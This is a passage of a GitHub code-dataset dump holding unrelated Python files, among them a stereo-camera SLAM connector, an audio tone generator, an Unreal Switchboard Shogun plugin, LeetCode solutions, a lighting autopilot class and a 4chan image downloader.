pass\n\n\nif __name__ == '__main__':\n osc = OrbSlam2Connector()\n cam1 = imageio.get_reader('', size=(1280, 720))\n cam2 = imageio.get_reader('', size=(1280, 720))\n\n # 读取相机参数\n stereo_cam_params_file = 'stereo_cam_params_imx322_1280x720.yml'\n f = cv2.FileStorage(stereo_cam_params_file, cv2.FILE_STORAGE_READ)\n matL = f.getNode('LM').mat()\n distL = f.getNode('LD').mat()\n matR = f.getNode('RM').mat()\n distR = f.getNode('RD').mat()\n R = f.getNode('R').mat()\n T = f.getNode('T').mat()\n hw = np.array([720, 1280])\n f.release()\n\n # 设定立体矩阵\n wh = tuple(hw[::-1])\n R1, R2, P1, P2, Q, validPixROI1, validPixROI2 = \\\n cv2.stereoRectify(matL, distL, matR, distR,\n wh, R, 
T, flags=cv2.CALIB_ZERO_DISPARITY, alpha=-1, newImageSize=wh)\n\n mapL1, mapL2 = cv2.initUndistortRectifyMap(matL, distL, R1, P1, wh, cv2.CV_16SC2)\n mapR1, mapR2 = cv2.initUndistortRectifyMap(matR, distR, R2, P2, wh, cv2.CV_16SC2)\n\n while True:\n imgL = cam1.get_next_data()\n imgR = cam2.get_next_data()\n\n imgL = cv2.rotate(imgL, cv2.ROTATE_180)\n imgR = cv2.rotate(imgR, cv2.ROTATE_180)\n\n # 校畸\n imgL = cv2.remap(imgL, mapL1, mapL2, cv2.INTER_LINEAR)\n imgR = cv2.remap(imgR, mapR1, mapR2, cv2.INTER_LINEAR)\n # imgL = cv2.resize(imgL, (640, 360), cv2.INTER_AREA)\n # imgR = cv2.resize(imgR, (640, 360), cv2.INTER_AREA)\n\n imgLR = np.concatenate([imgL, imgR], 1)\n imgLR = cv2.resize(imgLR, (1280, 360), interpolation=cv2.INTER_AREA)\n im_show = cv2.cvtColor(imgLR, cv2.COLOR_RGB2BGR)\n cv2.imshow('view', im_show)\n s, m = osc.get_pos(imgLR)\n print(s)\n cv2.waitKey(1000//30)\n\n","repo_name":"One-sixth/smart_car","sub_path":"orbslam2_connector.py","file_name":"orbslam2_connector.py","file_ext":"py","file_size_in_byte":5360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"21457611523","text":"# import time\n# import math\n# import pyaudio\n# from cffi.backend_ctypes import xrange\n#\n#\n# class Beeper(object):\n#\n# def __init__(self, **kwargs):\n# self.bitrate = kwargs.pop('bitrate', 16000)\n# self.channels = kwargs.pop('channels', 1)\n# self._p = pyaudio.PyAudio()\n# self.stream = self._p.open(\n# format = self._p.get_format_from_width(1),\n# channels = self.channels,\n# rate = self.bitrate,\n# output = True,\n# )\n# self._queue = []\n#\n# def __enter__(self):\n# return self\n#\n# def __exit__(self, exc_type, exc_val, exc_tb):\n# self.stream.stop_stream()\n# self.stream.close()\n#\n# def tone(self, frequency, length=1000, play=False, **kwargs):\n#\n# number_of_frames = int(self.bitrate * length / 1000.)\n#\n# record = False\n# x = 0\n# y = 0\n# while 1:\n# x += 1\n# v = math.sin(x / ((self.bitrate / float(frequency)) / math.pi))\n#\n# # Find where the sin tip starts.\n# if round(v, 3) == +1:\n# record = True\n#\n# if record:\n# self._queue.append(chr(int(v * 127 + 128)))\n# y += 1\n# if y > number_of_frames and round(v, 3) == +1:\n# # Always end on the high tip of the sin wave to clips align.\n# break\n#\n# def play(self):\n# sound = ''.join(self._queue)\n# self.stream.write(sound)\n# time.sleep(0.1)\n#\n#\n# with Beeper(bitrate=88000, channels=2) as beeper:\n# i = 0\n# for f in xrange(1000, 800-1, int(round(-25/2.))):\n# i += 1\n# length = math.log(i + 1) * 250 / 2. / 2.\n# beeper.tone(frequency=f, length=int(length))\n# beeper.play()\n\nimport numpy\nimport pyaudio\nimport math\nimport random\n\n\ndef sine(frequency, length, rate):\n length = int(length * rate)\n factor = float(frequency) * (math.pi * 2) / rate\n waveform = numpy.sin(numpy.arange(length) * factor)\n return waveform\n\n\ndef play_tone(stream, frequency, length, rate=44100):\n chunks = [sine(frequency, length, rate)]\n\n chunk = numpy.concatenate(chunks) * 0.25\n\n fade = 200\n\n fade_in = numpy.arange(0., 1., 1 / fade)\n fade_out = numpy.arange(1., 0., -1 / fade)\n\n chunk[:fade] = numpy.multiply(chunk[:fade], fade_in)\n chunk[-fade:] = numpy.multiply(chunk[-fade:], fade_out)\n\n stream.write(chunk.astype(numpy.float32).tostring())\n\n\ndef bassline():\n frequency = 300\n for i in range(1000000):\n play_tone(stream, frequency, .15)\n change = random.choice([-75, -75, -10, 10, 2, 3, 100, -125])\n print (frequency)\n if frequency < 0:\n frequency = random.choice([100, 200, 250, 300])\n else:\n frequency = frequency + change\n\nif __name__ == '__main__':\n p = pyaudio.PyAudio()\n stream = p.open(format=pyaudio.paFloat32,\n channels=1, rate=44100, output=4)\n\nbassline()","repo_name":"Andrew-Garanin/AudioDigitalFiltering","sub_path":"beeper.py","file_name":"beeper.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"71710088730","text":"\n\nimport random\n\ndef classes(room_dim, periods):\n#room_dim = list of room dimensions for each room (e.g. seat length x seat width)\n#periods = number of time periods (student has n periods (classes) a day)\n\n #determine number of students (seats) in each room\n room_size = []\n for n in room_dim: #for each set of dim in room_dim\n room_size.append(n[0] * n[1]) #size = r * c\n\n #determine total number of students, generate list of students\n num_students = sum(room_size) #total number of students\n students = range(num_students) #list of student numbers\n\n #assign students to classes\n class_list = []\n for i in range(periods): #repeats for each period\n random.shuffle(students) #shuffle list of students randomly\n\n d = 0\n for n in room_size:\n class_list.append(students[d:d + n]) #increments of students depending on room size\n d += n #keeps track of start of block, depending on size of previous room\n\n return(class_list) #class list includes lists of each class, repeated for different periods\n\nprint(classes([[1,2],[3,4]], 2)) #example\n\n###Notes:\n #Need to figure out how to implement student object with determining neighbors\n #Class list is a list, need to change back to array based on room dim to figure out neighbors\n\n","repo_name":"zackmcnulty/math_381_project","sub_path":"project-381-master/scratchwork-code/class-assignments.py","file_name":"class-assignments.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"34367335866","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n'''\n@author: Jeff Gould\n\n@description: file operation functions for black lists.\n'''\n\n#from functions import var\nfrom functions import *\n\n\n\n\ndef file_ops(df, server):\n\n named_full_log = server + full_log\n named_ip = server + ip\n named_ok = server + ok\n named_reject = server + reject\n flog = os.path.join(created_logs_dir, named_full_log)\n fip = os.path.join(created_logs_dir, named_ip)\n fok = os.path.join(created_logs_dir, named_ok)\n freject = os.path.join(created_logs_dir, named_reject)\n\n try:\n # create csv of all relevant columns\n df.to_csv(flog, index=False)\n\n # create csv of unique Ip address' and the frequency they appear\n ip_count = pd.DataFrame(columns=['IP', 'Frequency'])\n ip_count.IP = df.IP\n ip_count = ip_count.groupby('IP').agg({'Frequency': len})\n ip_count = ip_count.sort_values(by=['Frequency'], ascending=False)\n\n ip_count.to_csv(fip, index=True)\n\n # create csv of all OK request code 200\n ip_ok = df.loc[df.Code == 200]\n ip_ok.to_csv(fok, index=False)\n\n # create csv of all rejected request not code 200\n ip_rej = df.loc[df.Code != 200]\n ip_rej.to_csv(freject, index=False)\n\n logging.info(\"From file_ops() CSV's have been Created\")\n\n\n except Exception as e:\n logging.error('From file_ops()' + str(e))\n","repo_name":"Gould25/IPprojoct3113","sub_path":"functions/io_ops.py","file_name":"io_ops.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"27921404535","text":"from switchboard.config import CONFIG, Setting\nfrom switchboard.devices.device_base import Device, DeviceStatus\nfrom switchboard.devices.device_widget_base import DeviceWidget\nfrom switchboard.switchboard_logging import LOGGER\nimport switchboard.switchboard_utils as utils\n\nfrom PySide2 import QtWidgets\nfrom .thirdparty.vicon_core_api import vicon_core_api\nfrom .thirdparty.shogun_live_api import shogun_live_api\n\nimport datetime\nfrom functools import wraps\n\n\ndef unresponsive_shogun(f):\n \"\"\"\n Decorator to gracefully disconnect if a Shogun command comes back with vicon_core_api.client.RPCError\n \"\"\"\n @wraps(f)\n def wrapped(self, *args, **kwargs):\n try:\n return f(self, *args, **kwargs)\n except vicon_core_api.client.RPCError:\n self.device_qt_handler.signal_device_connect_failed.emit(self)\n return None\n except ModuleNotFoundError:\n LOGGER.error('Could not connect to Shogun because the module was not installed')\n return None\n\n return wrapped\n\n\nclass DeviceShogun(Device):\n def __init__(self, name, ip_address, **kwargs):\n self.setting_save_path = Setting(\"save_path\", \"Save Path\", \"\")\n super().__init__(name, ip_address, **kwargs)\n\n self.trigger_start = True\n self.trigger_stop = True\n\n self.client = None\n\n self._slate = 'slate'\n self._take = 1\n\n def device_settings(self):\n return super().device_settings() + [self.setting_save_path]\n\n @property\n def save_path(self):\n return self.setting_save_path.get_value()\n\n @save_path.setter\n @unresponsive_shogun\n def save_path(self, value):\n if self.setting_save_path.get_value() == value:\n return\n\n self.setting_save_path.update_value(value)\n\n self.set_capture_folder()\n\n @unresponsive_shogun\n def connect_listener(self):\n super().connect_listener()\n\n self.client = vicon_core_api.Client(self.ip_address)\n self.capture_service = shogun_live_api.CaptureServices(self.client)\n\n if self.client.connected:\n self.status = DeviceStatus.READY\n self.set_capture_folder()\n else:\n self.device_qt_handler.signal_device_connect_failed.emit(self)\n\n\n @unresponsive_shogun\n def set_slate(self, value):\n self._slate = value\n self.capture_service.set_capture_name(utils.capture_name(self._slate, self._take))\n\n @unresponsive_shogun\n def set_take(self, value):\n self._take = value\n self.capture_service.set_capture_name(utils.capture_name(self._slate, self._take))\n\n @unresponsive_shogun\n def set_capture_folder(self):\n d = datetime.date.today()\n\n save_path = d.strftime(self.save_path)\n\n # HOW TO MAKE DIR ON OTHER MACHINE\n #os.makedirs(save_path, exist_ok=True)\n\n result = self.capture_service.set_capture_folder(save_path)\n\n if result != vicon_core_api.result.Result.Ok:\n LOGGER.error(f'{self.name}: \"{save_path}\" is an invalid path. Capture Folder not set')\n\n @unresponsive_shogun\n def record_start(self, slate, take, description):\n if self.status == DeviceStatus.DISCONNECTED or not self.trigger_start:\n return\n\n self.set_slate(slate)\n self.set_take(take)\n\n result, _ = self.capture_service.start_capture()\n\n if result == vicon_core_api.result.Result.Ok:\n self.record_start_confirm(self.timecode())\n\n @unresponsive_shogun\n def record_stop(self):\n if self.status == DeviceStatus.DISCONNECTED or not self.trigger_stop:\n return\n\n result = self.capture_service.stop_capture(0)\n\n import time\n time.sleep(3)\n\n if result == vicon_core_api.result.Result.Ok:\n # TODO: THIS BLOCKS THE MAIN THREAD ON STOP. 
FIX THIS\n result, _, _ = self.capture_service.latest_capture_file_paths()\n # START HERE: GET PATHS OF FILES WRITTEN\n #LOGGER.debug(f'{result} {paths}')\n self.record_stop_confirm(self.timecode(), paths=None)\n\n def timecode(self):\n return '00:00:00:00'\n\n\nclass DeviceWidgetShogun(DeviceWidget):\n def __init__(self, name, device_hash, ip_address, icons, parent=None):\n super().__init__(name, device_hash, ip_address, icons, parent=parent)\n\n def _add_control_buttons(self):\n super()._add_control_buttons()\n self.trigger_start_button = self.add_control_button(':/icons/images/icon_trigger_start_disabled.png',\n icon_hover=':/icons/images/icon_trigger_start_hover.png',\n icon_disabled=':/icons/images/icon_trigger_start_disabled.png',\n icon_on=':/icons/images/icon_trigger_start.png',\n icon_hover_on=':/icons/images/icon_trigger_start_hover.png',\n icon_disabled_on=':/icons/images/icon_trigger_start_disabled.png',\n tool_tip='Trigger when recording starts',\n checkable=True, checked=True)\n\n self.trigger_stop_button = self.add_control_button(':/icons/images/icon_trigger_stop_disabled.png',\n icon_hover=':/icons/images/icon_trigger_stop_hover.png',\n icon_disabled=':/icons/images/icon_trigger_stop_disabled.png',\n icon_on=':/icons/images/icon_trigger_stop.png',\n icon_hover_on=':/icons/images/icon_trigger_stop_hover.png',\n icon_disabled_on=':/icons/images/icon_trigger_stop_disabled.png',\n tool_tip='Trigger when recording stops',\n checkable=True, checked=True)\n\n self.connect_button = self.add_control_button(':/icons/images/icon_connect.png',\n icon_hover=':/icons/images/icon_connect_hover.png',\n icon_disabled=':/icons/images/icon_connect_disabled.png',\n icon_on=':/icons/images/icon_connected.png',\n icon_hover_on=':/icons/images/icon_connected_hover.png',\n icon_disabled_on=':/icons/images/icon_connected_disabled.png',\n tool_tip='Connect/Disconnect from listener')\n\n self.trigger_start_button.clicked.connect(self.trigger_start_clicked)\n self.trigger_stop_button.clicked.connect(self.trigger_stop_clicked)\n self.connect_button.clicked.connect(self.connect_button_clicked)\n\n # Disable the buttons\n self.trigger_start_button.setDisabled(True)\n self.trigger_stop_button.setDisabled(True)\n\n def trigger_start_clicked(self):\n if self.trigger_start_button.isChecked():\n self.signal_device_widget_trigger_start_toggled.emit(self, True)\n else:\n self.signal_device_widget_trigger_start_toggled.emit(self, False)\n\n def trigger_stop_clicked(self):\n if self.trigger_stop_button.isChecked():\n self.signal_device_widget_trigger_stop_toggled.emit(self, True)\n else:\n self.signal_device_widget_trigger_stop_toggled.emit(self, False)\n\n def connect_button_clicked(self):\n if self.connect_button.isChecked():\n self._connect()\n else:\n self._disconnect()\n\n def _connect(self):\n # Make sure the button is in the correct state\n self.connect_button.setChecked(True)\n\n # Enable the buttons\n self.trigger_start_button.setDisabled(False)\n self.trigger_stop_button.setDisabled(False)\n\n # Emit Signal to Switchboard\n self.signal_device_widget_connect.emit(self)\n\n def _disconnect(self):\n # Make sure the button is in the correct state\n self.connect_button.setChecked(False)\n\n # Disable the buttons\n self.trigger_start_button.setDisabled(True)\n self.trigger_stop_button.setDisabled(True)\n\n # Emit Signal to Switchboard\n 
self.signal_device_widget_disconnect.emit(self)\n","repo_name":"chenyong2github/UnrealEngine","sub_path":"Engine/Plugins/VirtualProduction/Switchboard/Source/Switchboard/switchboard/devices/shogun/plugin_shogun.py","file_name":"plugin_shogun.py","file_ext":"py","file_size_in_byte":8361,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"32"}
+{"seq_id":"30018700517","text":"\ndef larger_than_right(lst):\n y = max(lst)\n g = lst.index(y)\n newlist = lst[g:]\n newerList = []\n for i,v in enumerate(newlist[:-1]):\n if v > max(newlist[i+1:]):\n newerList.append(v)\n \n if len(newlist) > 1:\n if newlist[-2] > newlist[-1]:\n newerList.append(newlist[-1])\n \n if len(newerList) == 0:\n newerList.append(y)\n \n return newerList\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"vC4P2jGR6wxED7MBL_15.py","file_name":"vC4P2jGR6wxED7MBL_15.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"42503130578","text":"\n# O-\n# /\n# O - O-\n# \\ \n# O-\n\nimport numpy as np\n\ndvalues=np.array([[1.,1.,1.],\n [2.,2.,2.],\n [3.,3.,3.]])\n\nweights=np.array([[1.2,-2.4,-1.3,-4.2],\n [2.4,2.1,-5.2,4.8],\n [-1.1,1.8,6.1,-2.3]]).T\n\ndx0=sum(weights[0]*dvalues[0])\ndx1=sum(weights[1]*dvalues[0])\ndx2=sum(weights[2]*dvalues[0])\ndx3=sum(weights[3]*dvalues[0])\ndinputs=np.array([dx0,dx1,dx2,dx3])\n\n# print(dinputs)\n\ndinputs=np.dot(dvalues,weights.T)\n# print(\"dinputs\\n\",dinputs)\n\ninputs=np.array([[1.2,3.1,1.2,3.1],\n [3.2,5.2,6.7,1.7],\n [4.2,6.3,1.2,6.6]])\n\ndweights=np.dot(inputs.T,dvalues)\n# print(\"dweights\\n\",dweights)\n\ndbias=np.sum(dvalues,axis=0,keepdims=True)\n# print(\"dbias\\n\",dbias)\n\nbias=[1,1,1]\n\nz=np.dot(inputs,weights)+bias\n\ndrelu=np.zeros_like(z)\ndrelu[z>0]=1\ndrelu*=dvalues\n# print(\"drelu\\n\",drelu)\n\n# optimizing drelu calculation\ndrelu=dvalues.copy()\ndrelu[z<=0]=0\n# print(drelu)\n\n# MINIMIZING RELU OUTPUT\noutput=np.dot(inputs,weights)+bias\noutput=np.maximum(output,0)\nprint(output)\ndrelu=output.copy()\ndrelu[output<=0]=0\ndinput=np.dot(drelu,weights.T)\ndweights=np.dot(inputs.T,drelu)\ndbias=np.sum(output,axis=0,keepdims=True)\nweights -= 0.001*dweights\nbias -= 0.001*dbias\nprint(\"minimized output\\n\",np.maximum(np.dot(inputs,weights)+bias,0))\n","repo_name":"Pointdexter16/Neural-Network-concepts-from-scatch-in-python","sub_path":"9.Backpropagation_layer_of_neurons.py","file_name":"9.Backpropagation_layer_of_neurons.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"15485254601","text":"\"\"\"\n动态规划\nhttps://leetcode.cn/problems/house-robber/description/?envType=study-plan-v2&envId=leetcode-75\n你是一个专业的小偷,计划偷窃沿街的房屋。每间房内都藏有一定的现金,影响你偷窃的唯一制约因素就是相邻的房屋装有相互连通的防盗系统,如果两间相邻的房屋在同一晚上被小偷闯入,系统会自动报警。\n\n给定一个代表每个房屋存放金额的非负整数数组,计算你 不触动警报装置的情况下 ,一夜之内能够偷窃到的最高金额。\n\n\n示例 1:\n\n输入:[1,2,3,1]\n输出:4\n解释:偷窃 1 号房屋 (金额 = 1) ,然后偷窃 3 号房屋 (金额 = 3)。\n 偷窃到的最高金额 = 1 + 3 = 4 。\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def rob(self, nums: List[int]) -> int:\n # if len(nums) == 0:\n # return 0\n\n # 分解成子问题\n \"\"\"\n f(k) = 偷[0..k)房间的最大金额\n f(0) = 0\n f(1) = nums[0]\n f(k) = max { rob(k-1), rob(k-2) + nums[k-1]}\n \"\"\"\n\n # n = len(nums)\n # dp = [0] * (n + 1)\n # dp[0] = 0\n # dp[1] = nums[0]\n pre = 0\n cur = 0\n # for i in range(2, n + 1):\n for i in nums:\n pre, cur = cur, max(cur,i+pre)\n # dp[i] = max(dp[i - 1], dp[i - 2] + nums[i - 1])\n return cur\n\n\nif __name__ == '__main__':\n res = Solution().rob([1, 3, 4, 6])\n print(res)\n","repo_name":"ChenZixinn/leetcode","sub_path":"medium/动态规划/198_打家劫舍.py","file_name":"198_打家劫舍.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"3608711009","text":"# Implement strStr().\n\n# Return the index of the first occurrence of needle in haystack, or -1 if needle is not part of haystack.\n\n# Example 1:\n\n# Input: haystack = \"hello\", needle = \"ll\"\n# Output: 2\n# Example 2:\n\n# Input: haystack = \"aaaaa\", needle = \"bba\"\n# Output: -1\n\ndef strStr(haystack, needle):\n if not needle:\n return 0\n if needle not in haystack:\n return -1\n else:\n w = haystack.index(needle)\n\n return w\n\nhaystack = \"maxwell\"\nneedle = \"we\"\n\nprint(strStr(haystack,needle))","repo_name":"Maxwell2016LeChouchou/coding","sub_path":"leetcode/python/strStr_28.py","file_name":"strStr_28.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"34616370508","text":"from dataclasses import dataclass\nfrom typing import TYPE_CHECKING\n\nimport numpy as np\nfrom loguru import logger # type:ignore\nfrom ravelights.core.bpmhandler import BeatStatePattern\nfrom ravelights.core.colorhandler import Color, ColorHandler\nfrom ravelights.core.device import Device\nfrom ravelights.core.settings import Settings\nfrom ravelights.core.utils import p\n\nif TYPE_CHECKING:\n from ravelights.core.ravelights_app import RaveLightsApp\n\n\n@dataclass\nclass AutoPilot:\n \"\"\"\n autopilot_loop_length [in beats]: randomized is called every n beats\n \"\"\"\n\n root: \"RaveLightsApp\"\n\n def __post_init__(self) -> None:\n self.settings: Settings = self.root.settings\n self.devices: list[Device] = self.root.devices\n\n self.settings.settings_autopilot = dict(\n autopilot=False,\n autopilot_loop_length=4,\n renew_pattern=True,\n p_renew_pattern=0.1, # use in timeline genselector\n renew_pattern_sec=True,\n p_renew_pattern_sec=0.1, # use in timeline genselector\n renew_vfilter=True,\n p_renew_vfilter=0.1, # use in timeline genselector\n renew_thinner=True,\n p_renew_thinner=0.1, # use in timeline genselector\n renew_dimmer=True,\n p_renew_dimmer=0.1, # use in timeline genselector\n color_primary=True,\n p_color_primary=0.1,\n timeline=True,\n p_timeline=0.1,\n alternate_pattern=True,\n p_alternate_pattern=0.1, # run on every item in selected seperately\n alternate_pattern_sec=True,\n p_alternate_pattern_sec=0.1, # run on every item in selected seperately\n triggers=True,\n p_triggers=0.1, # run on every item in selected seperately\n )\n\n def get_autopilot_controls(self):\n controls_autopilot = [\n dict(type=\"toggle\", name_toggle=\"autopilot\"),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"renew_pattern\",\n name_slider=\"p_renew_pattern\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"renew_pattern_sec\",\n name_slider=\"p_renew_pattern_sec\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"renew_vfilter\",\n name_slider=\"p_renew_vfilter\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"renew_dimmer\",\n name_slider=\"p_renew_dimmer\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"renew_thinner\",\n name_slider=\"p_renew_thinner\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"color_primary\",\n name_slider=\"p_color_primary\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"timeline\",\n name_slider=\"p_timeline\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"alternate_pattern\",\n name_slider=\"p_alternate_pattern\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"alternate_pattern_sec\",\n name_slider=\"p_alternate_pattern_sec\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"triggers\",\n name_slider=\"p_triggers\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(type=\"slider\", name_slider=\"autopilot_loop_length\", range_min=4, range_max=32, step=4, markers=True),\n ]\n return 
controls_autopilot\n\n def get_color_palette(self):\n # ─── Add Controls Color Palette ───────────────────────────────\n n_colors = 11\n controls_color_palette = [\n ColorHandler.get_color_from_hue(hue) for hue in np.linspace(0, 1, n_colors + 1)[:-1]\n ] + [Color(1, 1, 1)]\n return [f\"rgb({int(r*255)},{int(g*255)},{int(b*255)})\" for (r, g, b) in controls_color_palette]\n\n def randomize(self) -> None:\n \"\"\"Called every frame to randomize parameters within ravelights app.\"\"\"\n\n if not self.settings.settings_autopilot[\"autopilot\"]:\n return None\n\n beat_pattern = BeatStatePattern(loop_length=self.settings.settings_autopilot[\"autopilot_loop_length\"])\n if not beat_pattern.is_match(self.settings.beat_state):\n return None\n\n logger.info(\"run randomize routine\")\n\n # ─── Colors ───────────────────────────────────────────────────\n\n if self.settings.settings_autopilot[\"color_primary\"]:\n if p(self.settings.settings_autopilot[\"p_color_primary\"]):\n random_color = ColorHandler.get_random_color()\n logger.info(\"set new color_primary\")\n self.settings.color_engine.set_color_with_rule(color=random_color, color_key=\"A\")\n\n # ─── Triggers ─────────────────────────────────────────────────\n\n if self.settings.settings_autopilot[\"triggers\"]:\n for gen_type in [\"pattern\", \"pattern_sec\", \"vfilter\", \"dimmer\", \"thinner\"]:\n for timeline_level in range(1, 4): # levels 1 to 4\n if p(self.settings.settings_autopilot[\"p_triggers\"]):\n logger.info(f\"renew_trigger {gen_type} {timeline_level}\")\n self.settings.renew_trigger(gen_type=gen_type, timeline_level=timeline_level)\n","repo_name":"danuo/chromalights","sub_path":"src/ravelights/core/autopilot.py","file_name":"autopilot.py","file_ext":"py","file_size_in_byte":7014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"40298769548","text":"\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nimport urllib\r\nimport re\r\nimport os\r\nimport sys\r\n\r\ndef get_soup(url):\r\n return BeautifulSoup(requests.get(url).text, \"lxml\")\r\n\r\ndef get_main_page(board):\r\n return get_soup(\"http://boards.4chan.org/{}/\".format(board))\r\n\r\ndef get_thread_page(board, thread_id):\r\n return get_soup(\"http://boards.4chan.org/{}/res/{}\".format(board, thread_id))\r\n\r\ndef get_thread_ids(board):\r\n main_page = get_main_page(board)\r\n thread_ids = []\r\n for link in main_page.find_all(\"a\", class_=\"replylink\"):\r\n thread_ids.append(link[\"href\"][1:])\r\n return thread_ids\r\n\r\ndef get_image_urls(thread_id):\r\n thread_page = get_thread_page(\"g\", thread_id)\r\n image_urls = []\r\n for post in thread_page.find_all(\"div\", class_=\"postContainer\"):\r\n for link in post.find_all(\"a\"):\r\n if link.has_attr(\"href\") and link[\"href\"].endswith(\"jpg\"):\r\n image_urls.append(link[\"href\"])\r\n return image_urls\r\n\r\ndef download_image(url, filename):\r\n print (\"Downloading {} to {}\".format(url, filename))\r\n urllib.urlretrieve(url, filename)\r\n\r\ndef download_images(board):\r\n thread_ids = get_thread_ids(board)\r\n for thread_id in thread_ids:\r\n image_urls = get_image_urls(thread_id)\r\n for url in image_urls:\r\n download_image(url, url.split(\"/\")[-1])\r\n\r\ndef main():\r\n if len(sys.argv) < 2:\r\n print (\"Usage: python 4chan.py []\")\r\n sys.exit(1)\r\n board = sys.argv[1]\r\n if len(sys.argv) > 2:\r\n thread_id = sys.argv[2]\r\n image_urls = get_image_urls(thread_id)\r\n for url in image_urls:\r\n download_image(url, url.split(\"/\")[-1])\r\n else:\r\n download_images(board)\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"LeoEkky/OpenAI-Codex-Code-Generation","sub_path":"4chan search.py","file_name":"4chan search.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"}
+{"seq_id":"74922126492","text":"import json as json_module\nfrom typing import List, Union, Optional, Dict\nfrom ctypes import c_void_p, c_char, c_char_p, byref, POINTER, create_string_buffer\n\nfrom ._object import Object\nfrom ._library import yogi_core\nfrom ._json_view import JsonView\nfrom ._enums import ConfigurationFlags, CommandLineOptions\n\n\nclass Configuration(Object):\n \"\"\"Stores program parameters from different sources.\n\n A configuration represents a set of parameters that usually remain constant\n throughout the runtime of a program. Parameters can come from different\n sources such as the command line or a file. Configurations are used for\n other parts of the library such as application objects, however, they are\n also intended to store user-defined parameters.\n \"\"\"\n\n def __init__(self, flags: ConfigurationFlags = ConfigurationFlags.NONE):\n \"\"\"Create a configuration.\n\n Args:\n flags: Flags for changing the configuration's behaviour.\n \"\"\"\n handle = c_void_p()\n yogi_core.YOGI_ConfigurationCreate(byref(handle), flags)\n self._flags = flags\n super().__init__(handle)\n\n @property\n def flags(self) -> ConfigurationFlags:\n \"\"\"Configuration flags.\"\"\"\n return self._flags\n\n def update_from_command_line(self, argv: List[str], options: CommandLineOptions = ConfigurationFlags.NONE) -> None:\n \"\"\"Updates the configuration from command line options.\n\n If parsing the command line, files or any given JSON string fails, or\n if help is requested (e.g. by using the --help switch) then a\n DetailedFailureException will be raised containing detailed\n information about the error or the help text.\n\n Args:\n argv: List of command line arguments including the script name.\n options: Options to provide on the command line.\n \"\"\"\n args = (POINTER(c_char) * (len(argv)))()\n for i, arg in enumerate(argv):\n args[i] = create_string_buffer(arg.encode())\n\n yogi_core.YOGI_ConfigurationUpdateFromCommandLine(self._handle, len(args), args, options)\n\n def update_from_json(self, json: Union[JsonView, str, object]) -> None:\n \"\"\"Updates the configuration from a JSON object or a JSON object\n serialized to a string.\n\n If parsing fails then a DetailedFailureException will be raised\n containing detailed information about the error.\n\n Args:\n json: JsonView, serializable object or already serialized object.\n \"\"\"\n if not isinstance(json, JsonView):\n json = JsonView(json)\n\n yogi_core.YOGI_ConfigurationUpdateFromJson(self._handle, json.data.obj)\n\n def update_from_file(self, filename: str) -> None:\n \"\"\"Updates the configuration from a JSON file.\n\n If parsing the file fails then a DetailedFailureException will be\n raised containing detailed information about the error.\n\n Args:\n filename: Path to the JSON file.\n \"\"\"\n yogi_core.YOGI_ConfigurationUpdateFromFile(self._handle, filename.encode())\n\n def dump(self, *, resolve_variables: Optional[bool] = None, indentation: Optional[int] = None) -> str:\n \"\"\"Retrieves the configuration as a JSON-formatted string.\n\n Args:\n resolve_variables: Resolve all configuration variables. If this is\n None then variables will be resolved if and\n only if the configuration supports variables.\n indentation: Number of space characters to use for\n indentation. 
